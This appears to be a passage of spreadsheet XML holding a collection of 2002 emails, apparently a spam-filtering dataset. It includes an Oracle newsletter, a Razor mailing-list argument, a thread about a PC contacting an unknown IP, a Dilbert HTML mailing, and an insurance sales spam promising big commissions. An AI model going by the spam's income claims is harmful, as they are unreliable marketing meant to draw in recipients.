             &lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;a name="apac"&gt;&lt;/a&gt;APAC&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/div&gt;
         &lt;/div&gt;
       &lt;/div&gt;
       &lt;div align="left"&gt; 
         &lt;table width="100%" border="0" cellpadding="5"&gt;
           &lt;tr&gt; 
             &lt;td width="16%" height="47"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;a href="http://www.oracle.com/oracleworld"&gt;&lt;img src="http://otn.oracle.com/events/nsmailH020.gif" align=absmiddle 
 			width="104" height="104" border="0"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
             &lt;td width="84%" valign="top"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;OracleWorld 
               Online - Beijing &lt;br&gt;
               &lt;/font&gt;&lt;/b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Over 
               5,000 industry professionals from all over China and the world gathered 
               to learn how Oracle can help your business reduce costs, improve 
               efficiencies, and improve the way you run your business. If you 
               missed OracleWorld in Copenhagen, you can get all the highlights 
               including keynotes, conference presentations and whitepapers &lt;a href="http://www.oracle.com/oracleworld/online/beijing/"&gt;online&lt;/a&gt;.&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;br&gt;
       &lt;/div&gt;
       &lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;Oracle 
         iSeminars: Free &amp;amp; Live @ Your Desktop&lt;br&gt;
         &lt;/b&gt; Attend a FREE Oracle APAC iSeminar to learn more about how Oracle9i 
         - Application Server, Database &amp;amp; Tools could provide you with a complete 
         and cost-effective e-business infrastructure. &lt;/font&gt;&lt;/p&gt;
       &lt;div align="left"&gt;&lt;/div&gt;
       &lt;div align="center"&gt; 
         &lt;div align="center"&gt; 
           &lt;div align="center"&gt; 
             &lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Please 
               &lt;a href="http://isdapac.oracle.com/iccdocs/seminarList.shtml"&gt;click 
               here&lt;/a&gt; for further information and online registration for all 
               iseminars. (Please select correct time zone &amp;amp; click &amp;quot;reset&amp;quot;). 
               &lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;For any 
               questions, please &lt;a href="mailto:oracleisd_au@oracle.com"&gt;email&lt;/a&gt; 
               us.&lt;/font&gt; &lt;/p&gt;
             &lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;a name="emea"&gt;&lt;/a&gt;EMEA&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;table width="100%" border="0" cellpadding="5"&gt;
               &lt;tr&gt; 
                 &lt;td width="16%" height="56"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;a href="http://www.oracle.com/oracleworld"&gt;&lt;img src="http://otn.oracle.com/events/nsmailH020.gif" align=absmiddle 
 			width="104" height="104" border="0"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width="84%" valign="top"&gt;&lt;b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;OracleWorld 
                   Online - Copenhagen&lt;br&gt;
                   &lt;/font&gt;&lt;/b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Thousands 
                   of professionals from all over the world gathered to learn how 
                   Oracle can help your business reduce costs, improve efficiencies, 
                   and improve the way you run your business. If you missed OracleWorld 
                   in Copenhagen, you can get all the highlights including keynotes, 
                   conference presentations and whitepapers &lt;a href="http://www.oracle.com/oracleworld/online/copenhagen/"&gt;online&lt;/a&gt;.&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/div&gt;
         &lt;/div&gt;
         &lt;div align="left"&gt;&lt;br&gt;
         &lt;/div&gt;
         &lt;div align="left"&gt;&lt;b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Oracle 
           Technology Days Belgian &amp;amp; Luxembourg&lt;br&gt;
           &lt;/font&gt;&lt;/b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Join us 
           for the Oracle Technology Days - Featuring Oracle9i Release 2 &amp;#150; 
           Live, Local, Free! &lt;/font&gt;&lt;/div&gt;
       &lt;/div&gt;
       &lt;p align="left"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Join 
         us for this executive full-day event :&lt;br&gt;
         29/8/2002 - Brussels (sessions in English)&lt;br&gt;
         3/9/2002 - Gent (sessies in het Nederlands)&lt;br&gt;
         12/9/2002 - Li&amp;egrave;ge (session en fran&amp;ccedil;ais)&lt;/font&gt;&lt;/p&gt;
       &lt;p align="left"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;a href="http://www.oracle.com/go/?&amp;Src=1336077&amp;Act=17"&gt;Click 
         here&lt;/a&gt; for more information and registration.&lt;/font&gt;&lt;/p&gt;
       &lt;p align="left"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Regards,&lt;/font&gt;&lt;/p&gt;
       &lt;p align="left"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Oracle 
         Technology Network Team&lt;/font&gt;&lt;/p&gt;
       &lt;p align="left"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="1"&gt;UNSUBSCRIBE&lt;br&gt;
         &lt;/font&gt;&lt;/b&gt;&lt;font size="1"&gt; When you registered at OTN, you indicated you 
         would like to receive e-mail updates from us. If you do not want to receive 
         future e-mails, please visit our &lt;a href="http://otn.oracle.com/admin/account/membership.html"&gt;update 
         section&lt;/a&gt; , log in with your username and password, and UNCHECK the 
         I wish to receive informational e-mails box. &lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p align="left"&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;USERNAME 
         AND PASSWORD QUESTIONS?&lt;br&gt;
         &lt;/b&gt; Forget your OTN login information? Use our &lt;a href="http://otn.oracle.com/admin/account/membership.html"&gt;password 
         lookup&lt;/a&gt;.&lt;/font&gt;&lt;/p&gt;
       &lt;p align="left"&gt;&lt;b&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif"&gt;DUPLICATE 
         MESSAGES?&lt;br&gt;
         &lt;/font&gt;&lt;/b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="1"&gt; You may 
         have multiple accounts on OTN. Please send a message to &lt;a href="mailto:otn_us@oracle.com"&gt;OTN&lt;/a&gt; 
         with the username you're using to access http://otn.oracle.com. We'll 
         then contact you and delete the unused account. &lt;/font&gt; 
           &lt;/td&gt;
     &lt;td valign="top" width="16%" &gt; 
       &lt;div align="center"&gt; &lt;/div&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;p&gt;&lt;font face="Arial, helvetica" size="1"&gt;
 &lt;br&gt;To be removed from Oracle's mailing lists, send an email to: 
 &lt;br&gt;&lt;a href="mailto:unsubscribe@oracleeblast.com?subject=REMOVE OF ORACLE MAILING LIST 1400444&amp;body=REMOVE XXXXXX.YYYYY@RUHR-UNI-BOCHUM.DE "&gt;unsubscribe@oracleeblast.com&lt;/a&gt; 
 &lt;br&gt;with the following in the message body: 
 &lt;br&gt;REMOVE XXXXXX.YYYYY@RUHR-UNI-BOCHUM.DE
 &lt;br&gt;STOP 
 &lt;p&gt;
 [250000/116/137209217] 
 &lt;/font&gt;
 &lt;img src="http://www.oracle.com/elog/trackurl?di=1400444&amp;si1=137209217" border=0&gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The plight of Qadir Fedayee
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8404899,215/
 Date: 2002-09-30T19:25:01+01:00
 *Sydney dispatch:* An Afghan boy whose family was killed during massacres in 
 Mazar-i-Sharif has been denied asylum in Australia, says *David Fickling*.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; -----Original Message-----
 &gt; From: razor-users-admin@example.sourceforge.net
 &gt; [mailto:razor-users-admin@lists.sourceforge.net]On Behalf Of Craig
 &gt; R.Hughes
 &gt; On Thursday, August 8, 2002, at 02:28  PM, Vipul Ved Prakash wrote:
 &gt;
 &gt; I'm not sure I understand.  Let's say I am an honest
 &gt; razor-submitter, and I submit lots of stuff that everyone agrees
 &gt; is spam.
 Great, that is very nice of you.
 &gt; Now I get some opt-in mail which looks to me like
 &gt; spam.  I hit "this is spam".  My trust rating plummets --
 Good! Your opinion of what is spam is unreliable, and therefore, I don't
 *want* to trust you. IMHO, that is exactly the case that the trust system is
 supposed to sort out. People who incorrectly submit non-spam bulk mail to
 razor.
 &gt; assuming most other people recognized that it was in fact
 &gt; something they'd requested.  Now picture that this happens to
 &gt; lots of people in the system.
 Then those lots of people are unreliable, and therefore will all have
 minimal trust, but the people with a decent reliability and therefore trust
 level will help us all...
 &gt; Again, it might not be a problem, but I don't think we know
 &gt; yet.  It will probably take a little while for there to be
 &gt; enough data in the trust system for it to equilibriate (or has
 &gt; it been initialized based on all the submissions/revocations
 &gt; gathered before it was switched on?).  I suppose we'll know once
 &gt; it's equilibriated.  Certainly as of right now, people don't
 &gt; think SpamNet is working very well at all, where it had been
 &gt; working great a week ago.
 IMHO, due to the number of messages you are sending, and the way you are
 discussing TeS, (considering that you know *nothing* about it), certainly
 looks like you are simply trying to throw doubt/negativity onto razor.
 Personally, I haven't used razor for a few months now because I want to
 integrate it into qmail-scanner *without* spam assassin, but haven't had the
 time to do that, so even I can't comment on Razor at all.....
 Vipul &amp; co, I think it would be great if there was more transparency in the
 whole server process, ie, if you know there is a problem, then tell all of
 us, this will avoid all the stupid "Oh, it isn't working again, and it took
 me 324 days to work it out" etc...
 Just my $1 worth...
 Regards,
 Adam
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; That has the nasty side effect of placing all .py files in the
 &gt; package.  What about obvious executable scripts (like timtest or
 &gt; hammie)?  How can I keep them out of the package?
 Why would we care about installing a few extra files, as long as
 they're inside a package?
 --Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">Unfortunately, I don't. ZoneAlarm normally gives that info but not this
 time. It just blocks the outward access and warns me that the attempt
 occurred.
 Brian
 ----- Original Message -----
 From: "Martin Whelan" &lt;mwhelan@deisedesign.com&gt;
 To: &lt;iiu@taint.org&gt;
 Sent: Saturday, August 03, 2002 9:32 PM
 Subject: Re: [IIU] spyware calling home?
 &gt; Do you know which app is making the connection?
 &gt;
 &gt;
 &gt; At 20:18 03/08/02 +0100, you wrote:
 &gt; &gt;Hello all
 &gt; &gt;I'm looking for advice. My pc has developed a disturbing tendency of
 trying
 &gt; &gt;to access IP 62.17.143.253 without my consent. It has got to the stage
 where
 &gt; &gt;normal web-browsing is almost impossible.
 &gt; &gt;I have checked IP address on RIPE database and I know precisely who is
 being
 &gt; &gt;called. I contacted that company on 14 July, when the problem first arose
 &gt; &gt;and asked for a remedy but (surprise) got no reply.
 &gt; &gt;A helpful person on the ie.comp list suggested Adaware spyware removal. I
 &gt; &gt;ran this and haven't had a problem again until today.
 &gt; &gt;The offending program is obviously not in Adaware db. (I run adaware with
 &gt; &gt;current ref files every day now).?
 &gt; &gt;Any suggestions, please,  for removing whatever the f*** is causing this
 &gt; &gt;from my pc?
 &gt; &gt;Brian
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;_______________________________________________
 &gt; &gt;IIU mailing list
 &gt; &gt;IIU@iiu.taint.org
 &gt; &gt;http://iiu.taint.org/mailman/listinfo/iiu
 &gt;
 &gt; ========================================================================
 &gt; Martin Whelan | Dise Design | www.deisedesign.com | Tel : 086-8888975
 &gt;
 &gt; " Our core product Diseditor  allows organisations to publish
 information
 &gt; to their web site in a fast and cost effective manner. There is no need
 for
 &gt; a full time web developer, as the site can be easily updated by the
 &gt; organisations own staff.
 &gt; Instant updates to keep site information fresh. Sites which are updated
 &gt; regularly bring users back. Visit www.deisedesign.com/deiseditor.html for
 a
 &gt; demonstration "
 &gt;
 &gt; Diseditor  " Managing Your Information "
 &gt; ========================================================================
 &gt;
 &gt; _______________________________________________
 &gt; IIU mailing list
 &gt; IIU@iiu.taint.org
 &gt; http://iiu.taint.org/mailman/listinfo/iiu
 &gt;
 _______________________________________________
 IIU mailing list
 IIU@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Close 90% of Your Prospects
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_3C9CE7_01C2072F.40093DC0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  Work Smarter...Not Harder=0A=
 $300,000 Commission Seminar Sales System=09
 =20
  Learn the Secrets to Closing More Sales=0A=
 Develop the "Master Closer
 Mindset" with this system!
 =20
 =20
  =09
 Call or e-mail &lt;mailto:tlorigo@mho.net&gt;  us today!
  800-758-2203=09
 - OR - =09
 Please fill out the form below for more information	=20
 Name:	  =09
 E-mail	  =09
 Phone:	  =09
 City:	  	State:	  	 =09
  	  	 	   =09
 =20
 *This is not a guarantee, but and illustration of hypothetical results.
 Your income depends strictly upon your own efforts and thus, could vary.
 We don't want anybody to receive our mailing who does not wish to
 receive them. This is professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insurancemail.net
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; =20
 ------=_NextPart_000_3C9CE7_01C2072F.40093DC0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Close 90% of Your Prospects&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000" link=3D"#FF3300" =
 vlink=3D"#339966"&gt;
   &lt;table width=3D"553" border=3D"1" cellspacing=3D"0" cellpadding=3D"0" =
 bordercolor=3D"#000000" bgcolor=3D"#FFFFFF" align=3D"center"&gt;
     &lt;tr&gt;=20
       &lt;td&gt;=20
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/americorp/header2.jpg" =
 width=3D"550" height=3D"210" alt=3D'Work Smarter...Not =
 Harder&amp;#10;$300,000 Commission Seminar Sales System'&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"180" valign=3D"top" height=3D"306" =
 align=3D"center"&gt;=20
               &lt;p&gt;&lt;img =
 src=3D"http://iiq.us/images/americorp/persenr4_ani.gif" width=3D"180" =
 height=3D"337"&gt;&lt;br&gt;
                 &lt;img =
 src=3D"http://iiq.us/images/americorp/side_copy.gif" width=3D"180" =
 height=3D"182" alt=3D'Learn the Secrets to Closing More =
 Sales&amp;#10;Develop the "Master Closer Mindset" with this system!'&gt;&lt;/p&gt;
               &lt;/td&gt;
             &lt;td width=3D"370" valign=3D"top" height=3D"306" =
 align=3D"left"&gt;=20
               &lt;img src=3D"http://iiq.us/images/americorp/tab.gif" =
 width=3D"370" height=3D"45"&gt;&lt;br&gt;
               &lt;img src=3D"http://iiq.us/images/americorp/book.gif" =
 width=3D"370" height=3D"292"&gt;&lt;br&gt;
               &lt;img src=3D"http://iiq.us/images/americorp/book_bot.gif" =
 width=3D"370" height=3D"225"&gt;=20
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"0000CC"&gt;&lt;b&gt;
                 Call or &lt;a href=3D"mailto:tlorigo@mho.net"&gt;e-mail&lt;/a&gt; us =
 today!&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
                 &lt;img src=3D"http://iiq.us/images/americorp/phone2.gif" =
 width=3D"489" height=3D"64" alt=3D'800-758-2203'&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;- OR -&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"100%" bgcolor=3D"#FFFFFF"&gt;
                 &lt;tr&gt;=20
                   &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                     &lt;td&gt;=20
                       &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2" align=3D"center" =
 bgcolor=3D"#ffffff"&gt;
                         &lt;tr&gt;=20
                           &lt;td colspan=3D"5" align=3D"center"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2"&gt;&lt;b&gt;Please fill =
 out the form below for more information&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;Name:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;E-mail&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;Phone:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;City:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"30%"&gt;=20
                             &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                           &lt;/td&gt;
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;State:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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value=3D"tlorigo@mho.net"&gt;
                             &lt;input type=3D"hidden" =
 name=3D"hdnSubjectTxt" value=3D"Americorp Inquiry"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                       &lt;/table&gt;
                     &lt;/td&gt;
                   &lt;input type=3D'hidden' name=3D'SentTo' =
 value=3D'304704'&gt;
 &lt;/form&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"6"&gt;
           &lt;tr&gt;=20
             &lt;td bgcolor=3D"#000066"&gt;=20
               &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"1" color=3D"#FFFFFF"&gt;*This=20
                 is not a guarantee, but and illustration of hypothetical =
 results.=20
                 Your income depends strictly upon your own efforts and =
 thus, could=20
                 vary.&lt;br&gt;
                 We don't want anybody to receive our mailing who does =
 not wish to=20
                 receive them. This is professional communication sent to =
 insurance=20
                 professionals. To be removed from this mailing list, DO =
 NOT REPLY=20
                 to this message. Instead, go here: &lt;a =
 href=3D"http://www.insurancemail.net"&gt;http://www.insurancemail.net&lt;/a&gt;&lt;br=
 &gt;
                 &lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;=20
               &lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_3C9CE7_01C2072F.40093DC0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Daily Dilbert 07/22/2002
</t>
  </si>
  <si>
    <t xml:space="preserve">--20377789.1027333481921.JavaMail.root.umsan1
 Content-Type: text/plain; charset=ISO-8859-1
 Content-Transfer-Encoding: 7bit
 E-mail error
 You're subscribed to the HTML version of the Daily Dilbert,
 which shows the comic strip as a graphic, but your mail system
 either can't support HTML or is set up to remove HTML content. For
 more information, contact your Internet service provider or mail
 system administrator.
 To change to a plain text subscription, modify your account
 preferences at 
 http://www.dilbert.com/comics/dilbert/daily_dilbert/html/login.html
 The plain text option appears toward the bottom of the modification
 page.
 --20377789.1027333481921.JavaMail.root.umsan1
 Content-Type: text/html; charset=ISO-8859-1
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;Daily Dilbert&lt;/TITLE&gt;
 &lt;meta http-equiv=3D"pragma" content=3D"no-cache"&gt;
 &lt;META HTTP-EQUIV=3D"expires" CONTENT=3D"0"&gt;
 &lt;meta http-equiv=3D"Cache-control" content=3D"no-cache"&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=3D"#336699" text=3D"#000000" link=3D"#000000" vlink=3D"#00339=
 9" alink=3D"#3333CC" MARGINWIDTH=3D"0" MARGINHEIGHT=3D"8" LEFTMARGIN=3D"0" =
 TOPMARGIN=3D"8"&gt;
 &lt;TABLE WIDTH=3D"100%" BORDER=3D"0" CELLPADDING=3D"0" BGCOLOR=3D"#336699"&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR=3D"#336699" WIDTH=3D"15"&gt;&lt;IMG SRC=3D"http://www.comics.com/comi=
 cs/dilbert/images/clear_dot.gif" WIDTH=3D"15" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 &lt;TD BGCOLOR=3D"#336699"&gt;
 &lt;SCRIPT LANGUAGE=3D"JAVASCRIPT"&gt;
 &lt;!--=20
 function rand(n)=20
 {
 seed =3D (0x015a4e35 * seed) % 0xfffffff;
 return (seed &gt;&gt; 16) % n;
 }
 var now =3D new Date ();
 var seed =3D now.getTime() % 0xffffffff;
 var same =3D rand(1000);
 // End hiding script from old browsers --&gt;
 &lt;/SCRIPT&gt;
 &lt;SCRIPT Language=3D"JavaScript"&gt;
 &lt;!-- hide from old browsers
   var today =3D new Date()
 //--&gt;
 &lt;/SCRIPT&gt;
 &lt;!-- CONTENT AND SKYSCRAPER AD TABLE BEGIN --&gt;
 &lt;TABLE CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D"0"&gt;
 =09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09&lt;TD BGCOLOR=3D"#336699"&gt;
 =09=09=09&lt;!-- AD TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"468" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" =
 BORDER=3D"0" ALT=3D"Advertisement"&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/co=
 mics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" BORDER=3D"0" AL=
 T=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"21" BGCOLOR=3D"#336699" ROWSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"21"=
  HEIGHT=3D"72" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"120" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" =
 BORDER=3D"0" ALT=3D"Advertisement"&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/co=
 mics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" BORDER=3D"0" AL=
 T=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"18" BGCOLOR=3D"#336699" ROWSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"18"=
  HEIGHT=3D"72" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"468" BGCOLOR=3D"#336699"&gt;
 =09=09=09=09=09&lt;!-- BEGIN ENHANCED CREATIVE --&gt;
 =09=09=09=09=09&lt;SCRIPT LANGUAGE=3D"JavaScript"&gt;
 =09=09=09=09=09&lt;!--
 =09=09=09=09=09document.write ('&lt;TABLE WIDTH=3D"468" CELLSPACING=3D"0" CELL=
 PADDING=3D"0" BORDER=3D"0"&gt;&lt;TR VALIGN=3D"TOP"&gt;&lt;TD ALIGN=3D"LEFT"&gt;&lt;ILAYER ID=
 =3Dph1 VISIBILITY=3Dhidden width=3D"468" height=3D"60"&gt;&lt;/ILAYER&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;=
 /TABLE&gt;');
 =09=09=09=09=09document.write ('&lt;NOLAYER&gt;');
 =09=09=09=09=09document.write ('&lt;IFRAME SRC=3D"http://ad.doubleclick.net/ad=
 i/dilbert.email.com/email/;sz=3D468x60;ptile=3D1;ord=3D' + same + '?" name=
 =3D"frame1" width=3D"468" height=3D"60" frameborder=3D"no" border=3D"0" MAR=
 GINWIDTH=3D"0" MARGINHEIGHT=3D"0" SCROLLING=3D"no"&gt;');
 =09=09=09=09=09document.write ('&lt;A target=3D"_blank" HREF=3D"http://ummail4=
 .unitedmedia.com:80/Click?q=3D69-CY8iIoWDGqrh_WsMoxH_gxiEPRRR"&gt;');
 =09=09=09=09=09document.write ('&lt;IMG SRC=3D"http://ad.doubleclick.net/ad/di=
 lbert.email.com/email/;abr=3D!ie;sz=3D468x60;ptile=3D1;ord=3D' + same + '?"=
  border=3D"0" WIDTH=3D"468" HEIGHT=3D"60"&gt;&lt;/A&gt;&lt;/IFRAME&gt;');
 =09=09=09=09=09document.write ('&lt;/NOLAYER&gt;');=20
 =09=09=09=09=09//--&gt;
 =09=09=09=09=09&lt;/SCRIPT&gt;
 =09=09=09=09=09&lt;NOSCRIPT&gt;
 =09=09=09=09=09&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:=
 80/Click?q=3D93-V4ZmQSdcT6GA035cTJj3r1ioJdRR"&gt;&lt;IMG SRC=3D"http://ad.doublec=
 lick.net/ad/dilbert.email.com/email/;abr=3D!ie;sz=3D468x60;ptile=3D1;ord=3D=
 1986839?" BORDER=3D"0" WIDTH=3D"468" HEIGHT=3D"60"&gt;&lt;/a&gt;
 =09=09=09=09=09&lt;/NOSCRIPT&gt;
 =09=09=09=09=09&lt;!-- END ENHANCED CREATIVE --&gt;&lt;/TD&gt;
 =09=09=09=09=09
 =09=09=09=09=09
 =09=09=09=09=09
 =09=09=09=09=09&lt;TD WIDTH=3D"120" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.united=
